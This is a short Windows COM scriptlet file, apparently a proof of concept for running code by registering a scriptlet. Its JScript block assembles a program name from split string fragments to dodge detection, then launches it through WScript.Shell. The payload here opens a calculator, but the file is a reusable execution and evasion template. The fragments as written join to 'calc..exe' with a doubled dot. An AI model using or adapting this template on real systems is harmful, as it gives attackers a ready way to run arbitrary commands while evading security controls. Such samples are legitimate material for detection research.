<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="SimpleObfuscation"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<script language="JScript">
		<![CDATA[
	    		var sum='c';
			var sum1='a';
			var sum2='l';
			var sum3='c.';
			var sum4='.';			
			var sum5='e';
			var sum6='x';
			var sum7='e';
			var mon=sum+sum1+sum2+sum3+sum4+sum5+sum6+sum7;
			var r = new ActiveXObject("WScript.Shell");
			r.Run(mon);
		]]>
	</script>
</registration>
</scriptlet>
